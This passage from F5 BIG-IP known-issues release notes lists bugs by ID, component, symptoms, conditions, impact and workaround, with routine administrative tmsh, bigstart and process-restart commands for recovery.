Symptoms:
TMM cores.

Conditions:
- The APM pingaccess profile is configured.
- Before configuration load, modify pingaccess profile multiple times.

Impact:
TMM cores.

Workaround:
None


1128033-4 : Neuron client constantly logs errors when TCAM database is full

Links to More Info: BT1128033

Component: Local Traffic Manager

Symptoms:
A database held in hardware (TCAM), shared between tenants, has a limit that is exceeded by software in tenants that adds and manages entries in the database.

Symptomatic logs on tenant:

in /var/log/ltm, repeating logs are recorded, following is an example:

  err tmm[635]: 01010331:3: Neuron client neuron_client_pva_hwl failed with rule request submit(client connection is busy (has outstanding requests))

in /var/log/tmm, cycles of following group of logs are recorded:

  notice neuron_client_negotiate: Neuron client connection established
  notice [DDOS Neuron]Neuron daemon started
  notice hudproxy_neuron_client_closed_cb: Neuron client connection terminated
  notice [DDOS Neuron]Neuron daemon stopped
  
  For F5OS host, in partition /var/F5/partitionX/log/velos.log repeating logs are recorded, following is an example:
  
  tcam-manager[41]: priority="Err" version=1.0 msgid=0x6b01000000000007 msg="ERROR" MSG="TCAM processing Error(-5) executing:TCAM_INSERT for ruleno:0x20000000937"
  
In the log message, the msgid and ruleno can vary, but the Error(-5) is an indication of this issue.

Conditions:
The BIG-IP system with a rSeries r5xxx, r10xxx, r12xxx or has VELOS blades such as BX110.
The rSeries 2xxx, 4xxx and iSeries platforms are not affected.

Large configurations, on the order of high hundreds of virtual servers, are more likely to encounter issue.

Impact:
The neuron client software will restart and log repeatedly.
Inefficient use of TCAM database.

Workaround:
None


1126505-1 : HSB and switch pause frames impact data traffic

Links to More Info: BT1126505

Component: TMOS

Symptoms:
There are cases where the HSB and switch report pause frames on the HSB <-> switch interfaces. This can be seen in the switch interface stats:

name counters.rx_pause
---- -----------------
9.1 11522051
10.1 11392101

Conditions:
The iSeries platforms with an HSB and switch.

Impact:
There can be an impact on networking traffic.

Workaround:
There is no workaround for this issue. When this condition happens, the unit needs to be rebooted to clear the issue.


1125381-5 : Extraneous warnings recorded in when using only intermediate certificates

Links to More Info: BT1125381

Component: Local Traffic Manager

Symptoms:
When client authentication is enabled on the client SSL profile but the trusted-ca file includes only an intermediate certificate and no CA root cert to build the whole cert chain, although the TLS connection is made, as expected, there is an error message reported.

Conditions:
Trusted-ca includes only inter-cert and no root CA-cert
is configured.

Impact:
Although the TLS handshake succeeds without any issue and the connection is processed, as expected, a confusing warning is reported.

Workaround:
Because the connection is made, you can safely ignore this message.

Note: This issue does not occur if the root CA cert is also configured in the CA-cert bundle.


1124865-5 : Removal of LAG member from an active LACP trunk on r2k and r4k systems requires tmm restart

Links to More Info: BT1124865

Component: Local Traffic Manager

Symptoms:
Removal of LAG member from an active LACP trunk stops the traffic flow to the tenant launched on R2x00/R4x00 based appliances.

Conditions:
Removal of LAG member from an active LACP trunk on R2x00 and R4x00 appliances.

Impact:
Traffic flow gets impacted and the system misses the packets routed onto the LACP trunk from where the LAG member was removed.

Workaround:
- Restart tmm on all tenants that are associated with the trunk


1110485-7 : SSL handshake failures with invalid profile error

Links to More Info: BT1110485

Component: Local Traffic Manager

Symptoms:
1. TMM reports SSL handshake failures with reason "hud_ssl_handler:1208: alert(40) invalid profile unknown on VIP"

2. There will be Certificate read errors in the ltm log "reading: Unknown error."

Conditions:
-- The certificates associated with the SSL profile are corrupted by modifying/adding/deleting them manually/Venafi

-- There are frequent unintentional Certificate updates

Impact:
-- The BIG-IP system will not be able process the traffic
-- All traffic to particular virtual servers fails

Workaround:
1. Correct the certificates which are corrupted and make them valid.

2. Deattach/Remove the corresponding SSL profile from all virtual servers to which it is applied.

3. In the GUI open the virtual server and click on update and make sure there are no errors shown on the screen.

4. Now re-apply the SSL profile to the virtual server


1106489-5 : GRO/LRO is disabled in environments using the TMM raw socket "sock" driver.

Links to More Info: BT1106489

Component: TMOS

Symptoms:
GRO/LRO packets are not received: "tmctl -d blade tmm/ndal_rx_stats" shows "0" in "lro". The linux host has GRO disabled: "ethtool -k eth1 | grep generic-receive-offload" shows "off".

Conditions:
-- BIG-IP is deployed in a Hyper-V environment.
-- Any environment such that "tmctl -d blade tmm/device_probed" displays "sock" in "driver_in_use".

Impact:
Performance is degraded.

Workaround:
Manually enable GRO on the device: ethtool -K eth1 gro on

Check that it's enabled with: ethtool -k eth1 | grep generic-receive-offload


1105361-2 : Unable to deploy BIG-IP on Azure with D series(v5) or E series(v5) instance types

Links to More Info: BT1105361

Component: TMOS

Symptoms:
When the BIG-IP is deployed with either D series(v5) or E(v5) series, the Azure is unable to add a route to Azure which is used by Azure to communicate with the instance. It is throwing DHCP timeout error as below. Due to this, Azure is unable to communicate and fetch the status and other details of the instances deployed.

Conditions:
When the BIG-IP is deployed with either D series(v5) or E(v5) series

Impact:
Deployment of BIG-IP on Dv5/Ev5 series timeout due to OS Provisioning timeout.

Workaround:
Pre-requisite for this is accelerated networking which is supported on CentOS 7.4 or later. Currently BIG-IP uses CentOS 7.3


1100249-6 : SNAT with FLOW_INIT firewall rule may core TMM due to wrong type of underlying flow structure

Links to More Info: BT1100249

Component: Local Traffic Manager

Symptoms:
Tmm crashes with SIGSEGV while passing firewall traffic.

Conditions:
-- SNAT + firewall rule
-- FLOW_INIT used in an iRule

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None


1100081-3 : Error message "http_process_state_prepend - Invalid action:0x10a091" for version 15 and "http_process_state_prepend - Invalid action:0x107061" for versions 16 and 17 appears in the LTM log

Links to More Info: K21440462, BT1100081

Component: Access Policy Manager

Symptoms:
The error message "http_process_state_prepend - Invalid action:0x10a091" ("http_process_state_prepend - Invalid action:0x107061") erroneously appears in the /var/log/ltm log file.

The error message "Access encountered error: Access pcb policy result is neither not_started nor inprogress: 3" also appears in the /var/log/apm log file.

Conditions:
An http(s) virtual server that also has an Access profile and per-request-policy configured.

Impact:
There is no impact.

Workaround:
None


1093717-6 : BGP4 SNMP traps are not working.

Links to More Info: BT1093717

Component: TMOS

Symptoms:
BGP4 SNMP traps are not working.

Conditions:
--Perform any BGP related event and check for snmp traps.

Impact:
No BGP SNMP traps.

Workaround:
None


1091785-7 : DBDaemon restarts unexpectedly and/or fails to restart under heavy load

Links to More Info: BT1091785

Component: Local Traffic Manager

Symptoms:
While under heavy load, the Database monitor daemon (DBDaemon) may:
- Restart for no apparent reason
- Restart repeatedly in rapid succession
- Log the following error while attempting to restart:
   java.net.BindException: Address already in use (Bind failed)
- Fail to start (remain down) after several attempts, leaving database monitors disabled and marking monitored resources Down.

Conditions:
- One or more active GTM and/or LTM database monitors are configured with short probe-timeout, interval and timeout values (for example, 2, 5, or 16 respectively).
- A large number (for example, 2,000) of GTM and/or LTM database monitor instances (combinations of above monitor and pool member) are configured.
- Active GTM and/or LTM database monitors are configured with debug yes and/or count 0.

Impact:
The DBDaemon restarts for no apparent reason.
The DBDaemon fails to start (remain down) after several attempts, leaving database monitors disabled and marking monitored resources Down.

Workaround:
The conditions that are suspected to cause these symptoms include effects of ID1025089. This issue has not been confirmed to occur on BIG-IP versions which include a fix for ID1025089. On other versions, measures to prevent or reduce occurrences of ID1025089 (by reducing database monitor workload) are expected to also prevent or reduce occurrences of these symptoms.

If the DBDaemon fails to restart, the following steps may allow DBDaemon to restart successfully upon the next database monitor probe:

-- Check for a running instance of DBDaemon with the following command:

ps ax | grep -v grep | grep DBDaemon

-- If DBDaemon is running, this command will return a set of parameters including the numerical process ID (PID) at the beginning of the line and a command line that begins with "/usr/lib/jvm/jre/bin/java" and includes the parameter "com.f5.eav.DBDaemon", such as:

24943 ? Ssl 46:49 /usr/lib/jvm/jre/bin/java -cp /usr/lib/jvm/jre/lib/rt.jar:/usr/lib/jvm/jre/lib/charsets.jar:/usr/share/monitors/postgresql-jdbc.jar:/usr/share/monitors/DB_monitor.jar:/usr/share/monitors/log4j.jar:/usr/share/monitors/mssql-jdbc.jar:/usr/share/monitors/mysql-connector-java.jar:/usr/share/monitors/ojdbc6.jar -Xmx512m -Xms64m -XX:-UseLargePages -DLogFilePath=/var/log/DBDaemon-0.log com.f5.eav.DBDaemon 1521 24943 0

-- If a running DBDaemon process is identified, use the "kill" command to terminate the running DBDaemon process:

kill #
(where # is the DBDaemon PID from the above "ps" command)

-- Repeat the above "ps" command to confirm that the DBDaemon process has been terminated. If a new DBDaemon process has not been started (with a different PID), proceed to the next steps.

-- Check the /var/run directory for the presence of any files with names beginning with "DBDaemon", such as:

/var/run/DBDaemon-0.lock
/var/run/DBDaemon-0.pid
/var/run/DBDaemon-0.start.lock

Note: The numeric value in the above example filenames corresponds to the Route Domain of pool members monitored by database monitors. If the database monitors are only applied to pool members in the default route domain (RD 0), that value will be "0" as seen above. If database monitors are applied to pool members in a non-default route domain (RD 7, for example), the numeric value will correspond to that route domain, such as:
/var/run/DBDaemon-7.lock
/var/run/DBDaemon-7.pid
/var/run/DBDaemon-7.start.lock

-- If no DBDaemon process is running, delete any /var/run/DBDaemon* files. It is especially important to delete:
/var/run/DBDaemon-#.start.lock (indicates DBDaemon restart is in progress and that no further restart actions should be attempted)
/var/run/DBDaemon-#.pid (indicates current DBDaemon PID)

-- If the above actions do not result in DBDaemon restarting upon the next database monitor ping, then a complete BIG-IP restart will likely be required to recover from unknown conditions within the Java subsystem that may prevent successful DBDaemon operation:

bigstart restart

or:

reboot


1091021-7 : The BIG-IP system may not take a fail-safe action when the bigd daemon becomes unresponsive.

Links to More Info: BT1091021

Component: Local Traffic Manager

Symptoms:
You may observe LTM monitors malfunctioning on your system. For instance, you may notice some probes are not sent out on the network, and some monitored objects are showing the wrong status.

Conditions:
-- The bigd daemon consists of multiple processes (which you can determine by running "ps aux | grep bigd").

-- One or more of the processes (but not all of them) become disrupted for some reason and stop serving heartbeats to the sod daemon.

Under these conditions, sod will not take any fail-safe action and the affected bigd processes will continue running impaired, potentially indefinitely.

Impact:
LTM monitoring is impacted.

Workaround:
If you suspect this issue is occurring in your system, you can resolve it by killing all bigd processes using the following command:

pgrep -f 'bigd\.[0-9]+' | xargs kill -9

However, this does not prevent the issue from manifesting again in the future if the cause for bigd's disruption occurs again.

Monitoring may become further disrupted as bigd restarts, and a failover may occur depending on your specific configuration.

Another work around is to set only one bigd if that is possible.
modify sys db bigd.numprocs value 1
If only a single bigd is available, sod will detect when it is down.


1089625-3 : Java core dump with SIGABRT while high cpu load in BIG-IP

Links to More Info: BT1089625

Component: TMOS

Symptoms:
Observe the logs in /var/log/daemon.log

Nov 8 01:13:27 localhost.localdomain emerg logger[6270]: Re-starting restjavad

Java core generated in folder /var/core.

Conditions:
1. Provision ASM
2. Huge number of requests to restjavad
3. cpu is hitting 100%

Impact:
Restjavad will be restarted.

Workaround:
More heap memory can reduce cpu consuming operations, fewer GC cycles, less frequent minor GCs, overall less overhead for memory management can add for less cpu usage.

Please increase the value of provision.extramb and provision.restjavad.extramb by 200MB at a time ( 400, 600, 800 ...) till the issue resolves. Since changing the value of provision.extramb is service affecting you may want to start with a higher value so there is more room to experiment to find a good value for restjavad heap size. Note 500MB is equivalent to large management provisioning and 200MB is the same as medium management provisioning.

NB provision.extramb value doesn't sync between peers (by design) and must be changed on each peer, one at a time, and is service affecting when changed on active. On ASM provisioned system it can take approximately 15 minutes for system to reprovision.

tmsh modify sys db provision.extramb value 200 ( 400, 600, 800 ...)
tmsh modify sys db provision.restjavad.extramb value 600 (800, 1000, 1200 ...

bigstart restart restjavad

Increase timeout
# tmsh modify sys db icrd.timeout value 300
# tmsh modify sys db restjavad.timeout value 300
# tmsh modify sys db restnoded.timeout value 300

bigstart restart restjavad restnoded


1083405-7 : "Error connecting to named socket" from zrd

Links to More Info: BT1083405

Component: Global Traffic Manager (DNS)

Symptoms:
After an mcpd restart, zrd may not be able to re-establish a connection to named. This shows up in the /var/log/gtm file or in the GUI with a message similar to the following:

err zrd[27809]: 01150306:3: Error connecting to named socket 'Connection refused'.
(or)
err zrd[16198]: 01150306:3: Error connecting to named socket 'Connection timed out'.

Conditions:
After an mcpd restart

Impact:
Looking up or modifying zone records may fail.

Workaround:
Restart zrd and named

tmsh restart sys service zrd named


1082197-3 : RNAME and MNAME field order reversed for Synthetic SOAs sent for negative response

Links to More Info: BT1082197

Component: Global Traffic Manager (DNS)

Symptoms:
Synthetic SOA returned by BIG-IP has the MNAME and RNAME fields reversed, resulting in the wrong values being noted as the primary name server and mailbox of administrator, respectively.

Conditions:
-- Set the failure-rcode-response enabled and failure-rcode-ttl on a down WIP.
-- Perform a DNS query.
-- Observe the SOA.

Impact:
Per RFC (rfc1035) the order of the fields is significant and MNAME must come before RNAME. When reversed, consumers of the synthetic SOA will associate the wrong values with the wrong fields.


1077789-7 : System might become unresponsive after upgrading.

Links to More Info: BT1077789

Component: TMOS

Symptoms:
After upgrading, the system encounters numerous issues:

-- Memory exhaustion (very low MemAvailable) with no particular process consuming excessive memory.
-- High CPU usage usually due to high kswapd or iowait activity
-- System is unresponsive, difficult to log in, slow to accept commands.
-- Provisioning is incomplete; there is a small amount of memory amount assigned to 'host' category.

Conditions:
The device is provisioned for more than LTM, typically with ASM or APM as well or instead, and needs more host memory than a pure LTM system.

-- The configuration loads in the previous release, but does not load successfully on the first boot into the release you are upgrading to.
-- Device is upgraded and the configuration is rolled forward.
-- There may be other conditions preventing the configuration from loading successfully after an upgrade.

Exact conditions that trigger this issue could be varied.
Failure to reactivate license, if needed, before upgrade could cause it, or an actual config issue. The config load error will be shown in the ltm log - search on 'emerg load'; the actual failure should be shown a few lines before the general warning about config load failure.

Impact:
-- System down, too little host (4KB page) memory to be stable.
-- Difficulty logging in over SSH might require serial console access.

Workaround:
Reboot to an unaffected, pre-upgrade volume.

-- If the system is responsive enough, use 'tmsh reboot volume <N>' or switchboot to select an unaffected volume.

-- If the system is completely unresponsive, physically powercycle a physical appliance or reboot a BIG-IP Virtual Edition (VE) from an applicable management panel, and then select an unaffected volume from the GRUB menu manually.

Note: This requires that you have console access, or even physical access to the BIG-IP device if you are unable to SSH in to the unit. On a physical device, a non-responsive system might require that you flip the power switch.

For more information, see:
-- K9296: Changing the default boot image location on VIPRION platforms :: https://support.f5.com/csp/article/K9296
-- K5658: Overview of the switchboot utility :: https://support.f5.com/csp/article/K5658
-- K10452: Overview of the GRUB 0.97 configuration file :: https://support.f5.com/csp/article/K10452.


1074285-4 : Apmd crashes while handling JWT tokens.

Links to More Info: BT1074285

Component: Access Policy Manager

Symptoms:
An apmd crash might occur while handling JWT tokens.

Conditions:
The payload has invalid JSON during authentication.

Impact:
BIG-IP authorization disrupted while apmd restarts.

Workaround:
None


1073897-5 : TMM core due to memory corruption

Links to More Info: BT1073897

Component: Local Traffic Manager

Symptoms:
Tmm restarts

Conditions:
Unknown

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None


1071385-5 : SSL session resumption is incorrectly logging handshake failure messages

Links to More Info: BT1071385

Component: Local Traffic Manager

Symptoms:
Handshake failure messages are logged when the handshake was successful.

Conditions:
-- Client establishes connection with session resumption option

Impact:
Inaccurate information in log.

Workaround:
None


1069977-1 : Repeated TMM SIGABRT during ips_flow_process_data

Links to More Info: BT1069977

Component: Protocol Inspection

Symptoms:
IPS consumes excessive CPU time processing GTP related context entries and this causes the tmm clock not to be updated, because of which SOD tries to restart the TMM.

Conditions:
-- Heavy GTP traffic, and request creation messages are sent without sending the response messages.

Impact:
Traffic disrupted while tmm restarts.


1040277-8 : Syslog-ng issue may cause logging to stop and possible reboot of a system

Links to More Info: BT1040277

Component: TMOS

Symptoms:
A syslog-ng issue with remote logging to an invalid remote syslog server may lead to logging via syslog-ng to stop, even locally. CPU use of syslog-ng may increase.

For software version 13.1 only it may lead to BIG-IP unexpectedly rebooting due to host watchdog timeout, typically within hours to a day or two after syslog-ng gets hung up.

The cessation of logging happens at the time of the last 'Syslog connection broken' in /var/log/messages before reboot.
That message will appear without a preceding 'Syslog connection established' just before it with same timestamp.

At this time syslog-ng typically spins, using near 100% CPU.

Conditions:
Invalid syslog-ng server configuration or broken connection from BIG-IP toward configured syslog-ng remote server.

A server is configured as a remote syslog destination on the BIG-IP, but it or an intervening system responds to stream of log messages by breaking connection eg by sending ICMP port unreachable to BIG-IP.

Syslog-ng will note the connection attempt and that it has broken usually in the same second, and do so every 60s when it retries.
There may be many of these log pairs, repeating every minute in /var/log/messages, such as:

  Nov 25 03:14:01 localhost.localdomain notice syslog-ng[12452]: Syslog connection established; fd='14', server='AF_INET(192.168.1.1:514)', local='AF_INET(0.0.0.0:0)'
  Nov 25 03:14:01 localhost.localdomain notice syslog-ng[12452]: Syslog connection broken; fd='14', server='AF_INET(192.168.1.1:514)', time_reopen='60'

The final log reports 'connection broken', usually one minute after the last established/broken pair in the very rare event that syslog-ng hangs.

  Nov 25 03:15:01 localhost.localdomain notice syslog-ng[12452]: Syslog connection broken; fd='14', server='AF_INET(192.168.1.1:514)', time_reopen='60'

Impact:
Very rarely syslog-ng hangs in a non-functional state. Sometimes, this may lead to an unexpected reboot of BIG-IP. Loss of logs before restart and traffic disrupted while BIG-IP restarts.

Even if it does not reboot the loss of logging functionality can cause some daemons to block while logging and thus interrupt service.

Workaround:
Ensure syslog-ng server configuration is valid, and that the server is reachable. If a remote server is not reachable remove it from the BIG-IP syslog configuration.

If the system has encountered this issue it's important that syslog-ng is restarted if that (or equivalent such as reboot) hasn't already occurred, to resume its normal service and reduce risk of further issues.

  bigstart restart syslog-ng


1036645-4 : Running keyswap.sh on a VIPRION or VCMP platform may not complete successfully

Links to More Info: BT1036645

Component: Local Traffic Manager

Symptoms:
When running keyswap.sh to synchronize ssh keys on a multi-bladed system, keyswap.sh may not complete successfully.

Conditions:
-- A multi-bladed environment such as VIPRION or VCMP
-- The keyswap.sh script is run

Impact:
The keyswap.sh script may not complete successfully

Workaround:
Run keyswap.sh on the console
(or)
nohup /usr/bin/keyswap.sh -genkeys
(or)
stop csyncd before running keyswap.sh and then re-start it:

tmsh stop sys service csyncd
keyswap.sh -genkeys
tmsh start sys service csyncd


1036289-1 : Signature ID not displayed in Attack Signature details

Links to More Info: BT1036289

Component: Application Security Manager

Symptoms:
Only signature name is displayed in the "Attack signature detected" violation details. The ID is not displayed in the details nor in the event log.

Conditions:
Reviewing attack signature details

Impact:
The attack signature ID is not displayed, which makes it more difficult to correlate which attack signature was encountered.

Workaround:
Click on Attack Signature Documentation to know the signature ID.


1036221-3 : "Illegal parameter value length" is reported with parsing product length.

Links to More Info: BT1036221

Component: Application Security Manager

Symptoms:
"Illegal parameter value length" violation is reported with wrong parameter length.

Conditions:
A JSON parameter is encoded.

Impact:
The decoded value length of the parameter in the JSON payload will be reported instead of its original length.

Workaround:
None


1033937-6 : HTTP message router stats do not increment for virtual servers and pools

Links to More Info: BT1033937

Component: Local Traffic Manager

Symptoms:
The HTTP MR stats for virtual servers and pools do not increment

Conditions:
- BIG-IP system with HTTP using httprouter and passing traffic.
- View the MRF stats

Impact:
Virtual server and pool stats do not increment.


1032001-4 : Statemirror address can be configured on management network or clusterd restarting

Links to More Info: BT1032001

Component: TMOS

Symptoms:
- Able to create statemirror address on the same network as management or cluster network.
- Validation issues when attempting to remove a management address.
- Clusterd process restarts constantly.

Conditions:
- Management/cluster address set up with IPv6 and statemirror address is configured with IPv4.

Impact:
- Unable to make configuration changes to the management or cluster address until the statemirror address is removed.
- Clusterd process restarts constantly causing the blade or cluster to report as offline.


1029173-6 : MCPD fails to reply and does not log a valid message if there are problems replicating a transaction to PostgreSQL

Links to More Info: BT1029173

Component: TMOS

Symptoms:
In rare circumstances MCPD fails to reply to a request from TMSH, GUI, or any daemon, for example, SNMPD.

Following is an example error message:

Mar 29 00:03:12 bigip1 err mcpd[15865]: 01070734:3: Configuration error: MCPProcessor::processRequestNow: std::exception

If snmpd is the daemon that is impacted you might see this warning message:

warning snmpd[15561]: 010e0004:4: MCPD query response exceeding 270 seconds

Conditions:
- AFM is provisioned.
- MCPD fails to connect PostgreSQL.

Impact:
TMSH command save sys config might be hung.
SNMPD stops replying to SNMP GET requests.

Workaround:
If there are any hung TMSH commands, then quit.

If SNMPD stops responding to SNMP requests, then use the command bigstart restart snmpd to restart SNMPD.


1020881-3 : TMM crashes while passing APM traffic.

Links to More Info: BT1020881

Component: Access Policy Manager

Symptoms:
TMM crashes while passing APM traffic.

Conditions:
-- LTM + APM deployment.
-- Allow list in use.
-- iRules in use.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
#--- logout_irule starts
when HTTP_REQUEST {
  if { ([string tolower [HTTP::uri]] contains "closeconnection.aspx"
    || [string tolower [HTTP::uri]] contains "signout.aspx")
    && [ACCESS::session exists -state_allow -sid [HTTP::cookie MRHSession]] } {
      HTTP::respond 200 content {<html><body><h1>You are now logged out.</h1></body></html>}\
      "Set-Cookie" "F5_ST=deleted;expires=Thu, 01-Jan-1970 00:00:01 GMT;path=/"\
      "Set-Cookie" "MRHSHint=deleted;expires=Thu, 01-Jan-1970 00:00:01 GMT;path=/"\
      "Set-Cookie" "F5_HT_shrinked=deleted;expires=Thu, 01-Jan-1970 00:00:01 GMT;path=/"\
      "Set-Cookie" "F5_fullWT=deleted;expires=Thu, 01-Jan-1970 00:00:01 GMT;path=/"\
      "Set-Cookie" "LastMRH_Session=deleted;expires=Thu, 01-Jan-1970 00:00:01 GMT;path=/"\
      "Set-Cookie" "MRHSession=deleted;expires=Thu, 01-Jan-1970 00:00:01 GMT;path=/"

      ACCESS::session remove
      log local0. "iRule logout triggered: Removing access session for [ACCESS::session sid]"
      # disable HTTP_REQUEST events for all other iRules
      event disable
  }
}
#--- logout_irule ends


1014761-6 : [DNS][GUI] Not able to enable/disable pool member from pool member property page

Links to More Info: BT1014761

Component: Global Traffic Manager (DNS)

Symptoms:
You are unable to enable/disable DNS pool members from the pool member property page.

Conditions:
Making changes via the DNS pool member property page.

Impact:
You can submit the changes but the changes do not persist.

Workaround:
1. tmsh
or
2. enable/disable pool member from list of pool members instead of 'general properties' page


1014633-6 : Transparent / gateway monitors may fail if there is no route to a node

Links to More Info: BT1014633

Component: Local Traffic Manager

Symptoms:
Transparent or gateway UDP monitors may fail.

Conditions:
-- Transparent or gateway monitor configured.
-- Route does not exist to destination.

Impact:
The UDP monitor fails and the node / pool member is marked unavailable.

Workaround:
Add a route to the destination.


1012009-5 : MQTT Message Routing virtual may result in TMM crash

Links to More Info: BT1012009

Component: Local Traffic Manager

Symptoms:
The BIG-IP system provides an option to use Message Routing virtual servers for MQTT traffic. It uses a different approach to associate a client side and a server side than a standard virtual server. In some instances, a server side is incorrectly handled.

Conditions:
-- A Message Routing virtual with MQTT protocol.
-- A client attempts to reconnect.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None


1010301-2 : Long-Running iCall script commands can result in iCall script failures or ceasing to run

Links to More Info: BT1010301

Component: TMOS

Symptoms:
When an iCall script runs for at least 5 minutes (or the value of "tmsh list sys scriptd max-script-run-time", default 300), the Scriptd service attempts to terminate the script.

However, iCall commands that result in external commands such as "tmsh::save sys ucs" (as used in the f5.automated_backup template) can block the termination signal until the command exits, and then block the parent Scriptd service. If this condition remains for 65 more seconds (for a total single iCall script time of at least 365 seconds), the BIG-IP system restarts the Scriptd service.

If the already-running iCall script is running after Scriptd finishes restarting, there is an additional risk that the Scriptd service may be un-marked for high availability monitoring in the BIG-IP system. See the results of "tmsh list sys daemon-ha scriptd heartbeat" to understand the case. As a result, the next time a long-running iCall command blocks the Scriptd service may cause Scriptd to hang again, potentially preventing all further iCall script runs without manual intervention.

Conditions:
- An iCall script that takes at least 6 minutes 5 seconds to run, with individual command(s) that take at least 65 seconds to run.
- For example, the f5.automated_backup template, when a UCS backups takes at least 6 minutes 5 seconds to finish on your BIG-IP system.

Impact:
The iCall scripts repeatedly fail to finish or cease to run altogether.

Workaround:
Re-enable Scriptd HA daemon heartbeat check with the following command:

tmsh modify sys daemon-ha scriptd heartbeat enabled

If you believe your iCall scripts need more time to run normally, you can increase the maximum run time (with an example of 10 minutes) with the following command:

tmsh modify sys scriptd max-script-run-time 600


1009337-7 : LACP trunk down due to bcm56xxd send failure

Links to More Info: BT1009337

Component: TMOS

Symptoms:
Lacp reports trunk(s) down. lacpd reports having trouble writing to bcm56xxd over the unix domain socket /var/run/uds_bcm56xxd.

Conditions:
Not known at this time.

Impact:
An outage was observed.

Workaround:
Restart bcm56xxd, lacpd, and lldpd daemons.


1009161-5 : SSL mirroring protect for null sessions

Links to More Info: BT1009161

Component: Local Traffic Manager

Symptoms:
Possible tmm crash during ssl handshake with connection mirroring enabled.

Conditions:
14.1 after changes applied for ID760406 and ssl handshake dropped during ssl handshake session state.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
Disable connection mirroring


1006449-5 : High CPU utilization and slow SNMP response after upgrade

Links to More Info: BT1006449

Component: TMOS

Symptoms:
After upgrading from a 13.1.x release to a later release (such as 15.1.x), BIG-IP CPU utilization increases and SNMP is slow to respond.

Conditions:
-- SNMP client repeatedly polls BIG-IP for OIDs in multiple tables over a short period of time.
-- Following an upgrade

Impact:
SNMP queries take an unusually long time to return data, and BIG-IP CPU utilization is higher.

Workaround:
To the file /config/snmp/bigipTrafficMgmt.conf, add one line with the following content:

  cacheObj 16

This could be accomplished by executing the following command line from bash:

  # echo "cacheObj 16" >> /config/snmp/bigipTrafficMgmt.conf

After the above config file has been modified and saved, the "snmpd" daemon must be restarted, using one of two command variants:

  (on a BIG-IP appliance or VE system)

  # bigstart restart snmpd

  (on a a multi-slot VIPRION or vCMP guest)

  # clsh bigstart restart snmpd

(However, this adjustment will be lost when the BIG-IP software is next upgraded.)


1004953-7 : HTTP does not fall back to HTTP/1.1

Links to More Info: BT1004953

Component: Local Traffic Manager

Symptoms:
After upgrading, the BIG-IP system's HTTP profile no longer falls back to HTTP/1.1 if a client sends a corrupted URI.

Conditions:
-- Client sends a corrupted URI (for example a URI containing a space).

Impact:
The BIG-IP system treats the URI as an HTTP/0.9 request (as per RFC) and forwards only the first request line. In previous releases, the BIG-IP system treated the URI as a HTTP/1.1 request.

Workaround:
None.


1003225-5 : 'snmpget F5-BIGIP-LOCAL-MIB::ltmWebAccelerationProfileStat* returns zeroes

Links to More Info: BT1003225

Component: TMOS

Symptoms:
The values returned during an SNMP get are incorrect for the ltmWebAccelerationProfileStat.

The values should match what is displayed by running the tmsh command.

Conditions:
Performing an SNMP get:

snmpget -v 2c -c public localhost F5-BIGIP-LOCAL-MIB::ltmWebAccelerationProfileStatCacheSize.\"/Common/test\"

Impact:
The system reports inaccurate information for ltmWebAccelerationProfileStat stats.

Workaround:
None




This issue may cause the configuration to fail to load or may significantly impact system performance after upgrade


*********************** NOTICE ***********************

For additional support resources and technical documentation, see:
******************************************************